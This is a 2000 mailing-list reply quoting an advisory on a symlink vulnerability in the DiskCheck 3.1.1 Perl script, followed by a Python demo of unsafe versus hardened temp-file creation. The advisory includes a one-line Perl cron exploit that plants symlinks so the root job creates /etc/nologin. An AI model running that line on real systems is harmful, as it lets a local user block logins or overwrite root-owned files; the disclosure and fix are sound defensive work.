Subject: Re: Diskcheck 3.1.1 Symlink Vulnerability
From: Stan Bubrouski (secnetCROSSWINDS.NET)
Date: Mon Aug 07 2000 - 10:41:49 CDT


At 05:36 PM 8/5/00 +0900, You, Jin-Ho wrote:
>Diskcheck 3.1.1 Symlink Vulnerability
>
>1 Introduction
>
>DiskCheck is a Perl script that monitors how much space is available
>on your hard drive. Basically, it checks your drive space every
>hour and takes action based on the specifications in the config file
>/etc/diskcheck.conf.
>
>DiskCheck 3.1.1 is available from
>http://www.kaybee.org/~kirk/html/linux.html and
>RedHat Powertools 6.x.
>
>2 Vulnerability
>
>The command /etc/cron.hourly/diskcheck.pl is executed with root
>privilege every hour. It creates a temporary file whose default name,
>/tmp/diskusagealert.txt.<pid>, is defined in /etc/diskcheck.conf;
>the name is predictable, and the script is willing to follow symbolic
>links. This may allow malicious local users to create or overwrite
>arbitrarily named files.
>
>3 Exploit
>
>The following cron job creates the file, /etc/nologin.
>
>0 * * * * perl -e 'foreach $i (1..200) { $pid = $$ + $i; \
> symlink("/etc/nologin", "/tmp/diskusagealert.txt.$pid"); }'
>
>4 Solution
>
>Relocate the temporary file into a directory where only root can
>create a file.
>
>Example)
>
>Edit /etc/diskcheck.conf
>
> $tempfile = '/var/local/diskusagealert.txt'
>
># ls -ld /var/local
>drwxr-xr-x 2 root root 1024 Feb 7 1996 /var/local/
>
>
>You, Jin-Ho, jhyouchonnam.ac.kr

This was reported on the list about a month ago and is fixed in Red Hat's
current rawhide, and in Red Hat Pinstripe (7.0 beta). I don't know of any
other distros that include it.

-Stan Bubrouski
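The advisory's bug class, a predictable temp name opened in a way that follows a planted symlink, can be reproduced and contrasted with the safe open pattern without touching anything outside a scratch directory. The snippet below is an added illustration written in Python for this archive page; it is not diskcheck's own Perl code, and the directory, file names and the "nologin" stand-in target are constructed for the demonstration.

```python
import os
import tempfile


def naive_create(path, data):
    """Insecure pattern (what a plain open-for-write does): if a symlink sits at
    `path`, the kernel follows it and creates or truncates the link target."""
    with open(path, "w") as fh:
        fh.write(data)


def safe_create(path, data):
    """Hardened pattern: O_EXCL makes the open fail if anything already exists at
    `path` (a dangling symlink included), and O_NOFOLLOW refuses to traverse a
    symlink in the final component. Mode 0o600 keeps the report private."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)          # raises FileExistsError on a planted link
    with os.fdopen(fd, "w") as fh:
        fh.write(data)


def demo():
    """Constructed scenario: a symlink at the predictable temp name points at a
    file standing in for /etc/nologin. Returns
    (naive_open_clobbered_target, safe_open_refused, target_untouched_after_safe)."""
    with tempfile.TemporaryDirectory() as scratch:
        target = os.path.join(scratch, "nologin")                 # stand-in for /etc/nologin
        tmpname = os.path.join(scratch, "diskusagealert.txt.1234")  # predictable name
        os.symlink(target, tmpname)                               # planted link (constructed)

        naive_create(tmpname, "disk usage report\n")
        naive_clobbered = os.path.exists(target)                  # True: written through the link

        os.unlink(target)                                         # reset, link is now dangling again
        try:
            safe_create(tmpname, "disk usage report\n")
            safe_refused = False
        except FileExistsError:
            safe_refused = True
        return naive_clobbered, safe_refused, not os.path.exists(target)


if __name__ == "__main__":
    print(demo())  # (True, True, True)
```

Moving the file to a root-only directory, as the advisory suggests, removes the attacker's ability to plant the link; the O_EXCL|O_NOFOLLOW open (or `tempfile.mkstemp`, which uses the same flags and a random name) closes the hole even in a shared directory.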